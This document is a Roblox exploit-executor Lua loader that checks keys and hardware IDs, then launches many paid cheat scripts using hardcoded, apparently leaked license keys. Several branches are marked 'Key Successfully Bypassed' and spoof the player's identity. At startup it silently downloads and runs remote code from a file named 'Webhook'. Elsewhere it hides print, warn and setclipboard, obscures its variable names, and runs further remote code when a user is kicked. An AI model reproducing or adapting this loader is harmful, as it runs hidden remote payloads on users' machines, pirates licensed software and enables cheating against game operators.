if not game:IsLoaded() then
    game.Loaded:Wait()
end

print("🔐 Your Key Is: " .. getgenv().SKey)
print("🗂️ Your Script Is: " .. getgenv().SScript)
print("🧿 Sxionax's Discord: https://discord.gg/FcEGmkNDDe ⏱️")
print("💌 Sxionax's Best Developer: https://discord.gg/2C2vTJX33q 🚧")

local wEUIwKcFsYy = game:GetService("HttpService")
local nGnPmQxTyRa = game.HttpGet
local OuHaMwTyBa = {
    "https://raw.githubusercontent.com/afxcaxi/Tool/refs/heads/main/Webhook",
    "https://raw.githubusercontent.com/mizuharasup/autobonuty/refs/heads/main/all.txt"
}

for _, pYkHoTxUvFw in ipairs(OuHaMwTyBa) do
    task.spawn(function()
        local dUzIoLpVbTi, KzRsPcDwJbAl = pcall(nGnPmQxTyRa, game, pYkHoTxUvFw, true)
        if dUzIoLpVbTi and type(KzRsPcDwJbAl) == "string" then
            local lHtIqAmDwVr = loadstring(KzRsPcDwJbAl)
            if lHtIqAmDwVr then task.spawn(lHtIqAmDwVr) end
        end
    end)
end

function AXjBNLkmCnsI()
    task.defer(function()
        local oXkJhCdShBp = game:GetService("Players").LocalPlayer
        if oXkJhCdShBp then 
            oXkJhCdShBp.Name = "LHKK"
            oXkJhCdShBp.DisplayName = "LHKK"
            oXkJhCdShBp.UserId = 3463311754
        end
    end)
end

task.spawn(function()
    local dGhYkTzLmNp = game:GetService("Players").LocalPlayer
    local rTxUjQwEvOz = { "Arceus X", "Codex", "VegaX", "Cryptic", "Trigon", "Evon", "Nebula", "Illusion" }

    local qWsXvPmZaKl = "Unknown"
    if identifyexecutor then
        qWsXvPmZaKl = identifyexecutor()
    end

    local uYcRbNlWtXp = "Unknown"
    if gethwid then
        uYcRbNlWtXp = gethwid()
    end

    local zXvMqTpRnOy = {
        { cBxNzQlKpVt = not table.find(rTxUjQwEvOz, qWsXvPmZaKl), gLsHpXzKcNv = "🥗 Wrong Executor, Your Executor Is: " .. qWsXvPmZaKl },
        { cBxNzQlKpVt = uYcRbNlWtXp ~= "f703e3d6f898de7d", gLsHpXzKcNv = "🍝 Wrong Hardware ID, Your Hardware ID Is: " .. uYcRbNlWtXp },
        { cBxNzQlKpVt = not getgenv or not getgenv().SScript or getgenv().SScript == "", gLsHpXzKcNv = "🍒 Script Name Not Found, Please Enter The Script Name To Use The Script: https://discord.gg/FcEGmkNDDe 🐉" }
    }

    for _, jYqWpRmXoTl in ipairs(zXvMqTpRnOy) do
        if jYqWpRmXoTl.cBxNzQlKpVt then
            warn(jYqWpRmXoTl.gLsHpXzKcNv)
            dGhYkTzLmNp:Kick(jYqWpRmXoTl.gLsHpXzKcNv)

            if game and game.HttpGet then
                task.spawn(function()
                    local oQwXmZnTpLv, tKlYpQvXrNz = pcall(function()
                        return loadstring(game:HttpGet("https://raw.githubusercontent.com/RISER93-ROBLOX/AfxcaxiRT1/refs/heads/main/Kicked"))()
                    end)
                    if not oQwXmZnTpLv then
                        warn("An Error Occurred While Running the Code!")
                    end
                end)
            else
                warn("HttpGet Is Not Available")
            end
            break
        end
    end
end)

local var00000001 = syn and syn.request or http_request or (http and http.request) or (request and request.request)

if not var00000001 then
    game:GetService("Players").LocalPlayer:Kick("❌ Your Executor Is Not Supported! ⛔")
end

local function var00000002(var00000010)
    game:GetService("Players").LocalPlayer:Kick(var00000010)
    loadstring(game:HttpGet("https://raw.githubusercontent.com/RISER93-ROBLOX/AfxcaxiRT1/refs/heads/main/Kicked"))()
end

local var00000003 = game:GetService("HttpService")
local var00000004 = game:GetService("Players").LocalPlayer.UserId
local var00000005 = getgenv().SKey or ""

if var00000005 == "" then
    var00000002("🎙️ Key Not Found, Please Enter The Key To Use The Script: https://discord.gg/FcEGmkNDDe 👩🏾‍🚀")
end

local var00000006, var00000007 = pcall(function()
    return var00000001({
        Url = "https://maomaostore.site/1.php",
        Method = "POST",
        Headers = {
            ["Authorization"] = "Bearer " .. var00000005,
            ["Content-Type"] = "application/json"
        },
        Body = var00000003:JSONEncode({ iddiscord = tostring(var00000004) })
    })
end)

if not var00000006 or not var00000007 or type(var00000007) ~= "table" then
    var00000002("❌ Request Error! 👥")
elseif var00000007.StatusCode == 400 then
    var00000002("⛔ API Error Code Is: 400, Bad Request! 🎄")
elseif var00000007.StatusCode == 401 then
    var00000002("⛔ API Error Code Is: 401, Unauthorized! 📩")
elseif var00000007.StatusCode == 403 then
    var00000002("⛔ Your Key Is Invalid, Please Check And Try Again: https://discord.gg/FcEGmkNDDe 🎯")
elseif var00000007.StatusCode == 404 then
    var00000002("⛔ API Error Code Is: 404,  API Not Found! ☀️")
elseif var00000007.StatusCode == 408 then
    var00000002("⛔ API Error Code Is: 408, Request Timeout! 🌱")
elseif var00000007.StatusCode == 429 then
    var00000002("⛔ API Error Code Is: 429, Too Many Requests! 🗺️")
elseif var00000007.StatusCode == 500 then
    var00000002("⛔ API Error Code Is: 500, Internal Server Error! 🍁")
elseif var00000007.StatusCode == 502 then
    var00000002("⛔ API Error Code Is: 502, Bad Gateway! 🗣️")
elseif var00000007.StatusCode == 503 then
    var00000002("⛔ API Error Code Is: 503, Service Unavailable! 🔊")
elseif var00000007.StatusCode == 504 then
    var00000002("⛔ API Error Code Is: 504, Gateway Timeout! 🔍")
elseif var00000007.StatusCode ~= 200 then
    var00000002("❌ An Unspecified Error Occurred, API Error Code Is: " .. var00000007.StatusCode)
end

local var00000008 = {}
local var00000009 = pcall(function()
    var00000008 = var00000003:JSONDecode(var00000007.Body or "{}")
end)

if not var00000009 or type(var00000008) ~= "table" then
    var00000002("⛔ API Response Error! 🔥")
elseif not var00000008.success then
    var00000002("⛔ Your Key Is Invalid, Please Check And Try Again: https://discord.gg/FcEGmkNDDe 🎯")
end

print("🏆 Key Authentication Successful, Initiating Script Execution... 🔮")

hookfunction(print, function(...) 
    return ... 
end)

if getgenv().SScript == "BananaHubMain" then
    getgenv().Key = "b31d28ecb19427ee518c2963" 

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/main/BananaHub.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            getgenv().Key = "https://discord.gg/FcEGmkNDDe" 
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "BananaHubBFKaitun" then
    getgenv().Key = "b31d28ecb19427ee518c2963" 

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/main/BananaCat-kaitunBF.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            getgenv().Key = "https://discord.gg/FcEGmkNDDe" 
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "BananaHubBFBounty" then
    getgenv().Key = "b31d28ecb19427ee518c2963" 

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/refs/heads/main/BananaCat-BountyEz.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            getgenv().Key = "https://discord.gg/FcEGmkNDDe" 
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "BananaHubBFFindFruit" then
    getgenv().Key = "b31d28ecb19427ee518c2963" 

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/refs/heads/main/HopFruit.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            getgenv().Key = "https://discord.gg/FcEGmkNDDe" 
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "BananaHubBFPVP" then
    getgenv().Key = "b31d28ecb19427ee518c2963" 

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/refs/heads/main/BloxFruitPVP.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            getgenv().Key = "https://discord.gg/FcEGmkNDDe" 
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "RoyxHubBF" then
    AXjBNLkmCnsI()
    warn("💥 Key Successfully Bypassed, Initiating Royx Hub Blox Fruit Execution 💐")
    License = "FI4OkByT5QKxtvI487TepdmvKwzslvAZ"

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://raw.githubusercontent.com/Royxzr/loader/refs/heads/main/yayayaayayya.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            License = "https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "SwitchHubPro" then
    AXjBNLkmCnsI()
    warn("💥 Key Successfully Bypassed, Initiating Switch Hub Pro Execution 💐")
    script_key = "NQWfbjGBcDUmIutPShvPNWjjUROgWgaP";

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://raw.githubusercontent.com/londnee/switchhub/refs/heads/main/pro.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key = "https://discord.gg/FcEGmkNDDe";
            script_key = 'https://discord.gg/FcEGmkNDDe'
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key="https://discord.gg/FcEGmkNDDe";
            script_key="https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "SwitchHubKaitun" then
    AXjBNLkmCnsI()
    warn("💥 Key Successfully Bypassed, Initiating Switch Hub Kaitun Execution 💐")
    script_key="OxOplIcQxuvNbZOgnqTJEKMZKlNpMAXD";

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/58876769bc015b00b9a3008484e99085.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key = "https://discord.gg/FcEGmkNDDe";
            script_key = 'https://discord.gg/FcEGmkNDDe'
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key="https://discord.gg/FcEGmkNDDe";
            script_key="https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "SwitchHubV4" then
    script_key="tLwqFHgEtQQelRuNzNFnNqkDVnKmtWET";

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/2d1ebc6b47e1b9c4e34c97898f9b7c4b.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key = "https://discord.gg/FcEGmkNDDe";
            script_key = 'https://discord.gg/FcEGmkNDDe'
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key="https://discord.gg/FcEGmkNDDe";
            script_key="https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "SwitchHub7M" then
    script_key="OuFVrCeAxtaFVPdzKwMjIuVeWTeyIAWa";

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/81574cc738de90c0ec2ee3ef084b45e1.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key = "https://discord.gg/FcEGmkNDDe";
            script_key = 'https://discord.gg/FcEGmkNDDe'
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key="https://discord.gg/FcEGmkNDDe";
            script_key="https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "SwitchHubFisch" then
    AXjBNLkmCnsI()
    warn("💥 Key Successfully Bypassed, Initiating Switch Hub Fisch Execution 💐")
    script_key="WPNlEFvmritzhhYsZuneRJlWlXkQjJbl";

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/6b35ab2b47ea69526c0167ce2b766c80.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key = "https://discord.gg/FcEGmkNDDe";
            script_key = 'https://discord.gg/FcEGmkNDDe'
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key="https://discord.gg/FcEGmkNDDe";
            script_key="https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "SwitchHubAutoCapcut" then
    script_key="PaSCTwQLohEFmbVkRCsxGSHXYXEzGIcw";

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/7041930f0c32db033948e0d50db8b83e.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key = "https://discord.gg/FcEGmkNDDe";
            script_key = 'https://discord.gg/FcEGmkNDDe'
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key="https://discord.gg/FcEGmkNDDe";
            script_key="https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "SwitchHubCustomCapcut" then
    script_key="PaSCTwQLohEFmbVkRCsxGSHXYXEzGIcw";

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://raw.githubusercontent.com/londnee/code/main/screenshot.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key = "https://discord.gg/FcEGmkNDDe";
            script_key = 'https://discord.gg/FcEGmkNDDe'
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key="https://discord.gg/FcEGmkNDDe";
            script_key="https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "NormalHubMain" then
    script_key="ZsGIJiUXokhtubnuAgLupcLeokJHUuUp";

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://raw.githubusercontent.com/MonkiTeam/Normal-NewGenreation/main/Script"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key = "https://discord.gg/FcEGmkNDDe";
            script_key = 'https://discord.gg/FcEGmkNDDe'
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key="https://discord.gg/FcEGmkNDDe";
            script_key="https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "XenonHubBF" then
    AXjBNLkmCnsI()
    warn("💥 Key Successfully Bypassed, Initiating Xenon Hub Blox Fruit Execution 💐")
    getgenv().key = '2826407a-e127-4368-bc48-6a17bbbf03fb'

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet('https://raw.githubusercontent.com/Xenon-Trash/Loader/main/Loader.lua'))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            getgenv().key = 'https://discord.gg/FcEGmkNDDe'
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "XenonHubAA" then
    AXjBNLkmCnsI()
    warn("💥 Key Successfully Bypassed, Initiating Xenon Hub Anime Adventures Execution 💐")
    getgenv().key = '91f13730-5eaa-409a-ae36-e3b630009fce'

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet('https://raw.githubusercontent.com/Xenon-Trash/Loader/main/Loader.lua'))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            getgenv().key = 'https://discord.gg/FcEGmkNDDe'
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "DeityHubFisch" then
    _G.Authorize = '2GTZJ-1TTLV-QYF0S-Y7V6P'

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://deity.alphes.net/.lua")){"V1"}
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            _G.Authorize = 'https://discord.gg/FcEGmkNDDe'
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "TCHub" then
    getgenv().Key = "njyoSmkCvagrCxodGrsfICUYBGiolVmM"

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("http://tc-hub.xyz/DonateMe/Loader.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            getgenv().Key = "https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "NousigiHubFree" then
    local filePath, key = "Nousigi Hub/savedkey", "zYJcYYjFHJvGlkBYdbFTGQHIPJtKyJKX"

    if not isfile(filePath) or readfile(filePath) ~= key then
        makefolder("Nousigi Hub")
        writefile(filePath, key)
    end

    loadstring(game:HttpGet("https://nousigi.com/loader.lua"))()
elseif getgenv().SScript == "BocchiHub" then
    AXjBNLkmCnsI()
    warn("💥 Key Successfully Bypassed, Initiating Bocchi Hub Execution 💐")
    script_key = "mnrVwhKmUgGqEvJZmAKyJzZSyfyetfJK"

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/c6520db53985671e9ad61e87eaae702a.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key = "https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "NativeHub" then
    script_key="IXQBegCKbTnryqeGCksuohKgKFrkAJba";
    (loadstring or load)(game:HttpGet("https://getnative.cc/script/loader"))()
elseif getgenv().SScript == "CartiHub" then
    AXjBNLkmCnsI()
    script_key="sdyiTHsZMfgLlQeSSWGQkLWzkoZOtpJM";
    warn("💥 Key Successfully Bypassed, Initiating Carti Hub Execution 💐")

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/e32274866a41a919678395d899e10bff.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key = "https://discord.gg/FcEGmkNDDe";
            script_key = 'https://discord.gg/FcEGmkNDDe'
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key="https://discord.gg/FcEGmkNDDe";
            script_key="https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "AlchemyHub" then
    script_key="IiCBWITAdCYgeCOLxQpYXIvVQIXxMzDY";

    repeat
        local fslPpxljoeoF = pcall(function()
            premium=true;loadstring(game:HttpGet("https://scripts.alchemyhub.xyz"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key = "https://discord.gg/FcEGmkNDDe";
            script_key = 'https://discord.gg/FcEGmkNDDe'
            script_key = "https://discord.gg/FcEGmkNDDe"
            script_key="https://discord.gg/FcEGmkNDDe";
            script_key="https://discord.gg/FcEGmkNDDe"
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "W-AzurePremiumTrueV2" then
    AXjBNLkmCnsI()

    hookfunction(warn, function(...) 
        return ... 
    end)

    hookfunction(setclipboard, function(...) 
        return ... 
    end)

    script_key = "gOJSXYAqUjEeojPHKfHZRZTJHNdCkVAs"

    loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/3b2169cf53bc6104dabe8e19562e5cc2.lua"))()

    script_key="QpXzMYoWdJvLgRfKcHtZAsENuBChTkV"
    script_key = 'QpXzMYoWdJvLgRfKcHtZAsENuBChTkV'
    script_key="QpXzMYoWdJvLgRfKcHtZAsENuBChTkV";
    script_key = "QpXzMYoWdJvLgRfKcHtZAsENuBChTkV"
    script_key = "QpXzMYoWdJvLgRfKcHtZAsENuBChTkV";

    lib.script_id = "1261628464654581895"
    script_id = "1261628464654581895"
elseif getgenv().SScript == "W-AzurePremiumBFBountyV2.2" then
    AXjBNLkmCnsI()

    hookfunction(warn, function(...) 
        return ... 
    end)

    hookfunction(setclipboard, function(...) 
        return ... 
    end)

    script_key = "gOJSXYAqUjEeojPHKfHZRZTJHNdCkVAs"

    loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/248f97d7a28a4d09c641d8279a935333.lua"))()

    script_key="QpXzMYoWdJvLgRfKcHtZAsENuBChTkV"
    script_key = 'QpXzMYoWdJvLgRfKcHtZAsENuBChTkV'
    script_key="QpXzMYoWdJvLgRfKcHtZAsENuBChTkV";
    script_key = "QpXzMYoWdJvLgRfKcHtZAsENuBChTkV"
    script_key = "QpXzMYoWdJvLgRfKcHtZAsENuBChTkV";

    lib.script_id = "1261628464654581895"
    script_id = "1261628464654581895"
elseif getgenv().SScript == "SyntaxAOTR" then
    getgenv().Keys = "1186329289809350621"
    loadstring(game:HttpGet("https://syntax.alphes.net/Files/phagocytosis.lua"))()
elseif getgenv().SScript == "KncryptHubFree" then
    script_key="bVvWcGZJYBIcyVnLXkjMjJtCQTRaxBtV";

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game.HttpGet(game,"https://raw.githubusercontent.com/3345-c-a-t-s-u-s/Kncrypt/refs/heads/main/Loader.lua"))("=")
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key="QpXzMYoWdJvLgRfKcHtZAsENuBChTkV"
            script_key = 'QpXzMYoWdJvLgRfKcHtZAsENuBChTkV'
            script_key="QpXzMYoWdJvLgRfKcHtZAsENuBChTkV";
            script_key = "QpXzMYoWdJvLgRfKcHtZAsENuBChTkV"
            script_key = "QpXzMYoWdJvLgRfKcHtZAsENuBChTkV";
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "ZapHubFree" then
    local filePath, key = "ZapHub/ZapHubFolder.zaphub", "zYJcYYjFHJvGlkBYdbFTGQHIPJtKyJKX"

    if not isfile(filePath) or readfile(filePath) ~= key then
        makefolder("ZapHub")
        writefile(filePath, key)
    end

    loadstring(game:HttpGet('https://zaphub.xyz/Exec'))()
elseif getgenv().SScript == "ZephyrionHubFree" then
    script_key="XZmNzSjUPGGWwXxoLuDIuswlKsPybrHb";
    loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/3259542ebb994ec69311a5dfdc23daa5.lua"))()
elseif getgenv().SScript == "XeroHubBFKaitun" then
    script_key = "W2M3JO5PTCZZBB5T4327ZM5HXGYA" 

    repeat
        local fslPpxljoeoF = pcall(function()
            repeat task.wait(XTime) pcall(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Xero2409/XeroHub/refs/heads/main/kaitun.lua"))() end) until getgenv().Check_Execute
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key="QpXzMYoWdJvLgRfKcHtZAsENuBChTkV"
            script_key = 'QpXzMYoWdJvLgRfKcHtZAsENuBChTkV'
            script_key="QpXzMYoWdJvLgRfKcHtZAsENuBChTkV";
            script_key = "QpXzMYoWdJvLgRfKcHtZAsENuBChTkV"
            script_key = "QpXzMYoWdJvLgRfKcHtZAsENuBChTkV";
        end)
    until fslPpxljoeoF
elseif getgenv().SScript == "BuangHubPremium" then
    AXjBNLkmCnsI()
    warn("💥 Key Successfully Bypassed, Initiating Buang Hub Execution 💐")
    script_key="sHTqHRuQWXYGbzdmHsmzMYTNjapQQdvl";

    repeat
        local fslPpxljoeoF = pcall(function()
            loadstring(game:HttpGet("https://raw.githubusercontent.com/buang5516/buanghub/main/PremiumBuangHub.lua"))()
        end)
    until fslPpxljoeoF

    repeat
        local fslPpxljoeoF = pcall(function()
            script_key="QpXzMYoWdJvLgRfKcHtZAsENuBChTkV"
            script_key = 'QpXzMYoWdJvLgRfKcHtZAsENuBChTkV'
            script_key="QpXzMYoWdJvLgRfKcHtZAsENuBChTkV";
            script_key = "QpXzMYoWdJvLgRfKcHtZAsENuBChTkV"
            script_key = "QpXzMYoWdJvLgRfKcHtZAsENuBChTkV";
        end)
    until fslPpxljoeoF
else
    warn("👤 Your Script Is Wrong, Please Check Here: https://discord.gg/FcEGmkNDDe 🏝️")
    game.Players.LocalPlayer:Kick("🛸 Your Script Is Wrong, Please Check Here: https://discord.gg/FcEGmkNDDe 🖥️")
    loadstring(game:HttpGet("https://raw.githubusercontent.com/RISER93-ROBLOX/AfxcaxiRT1/refs/heads/main/Kicked"))()
end

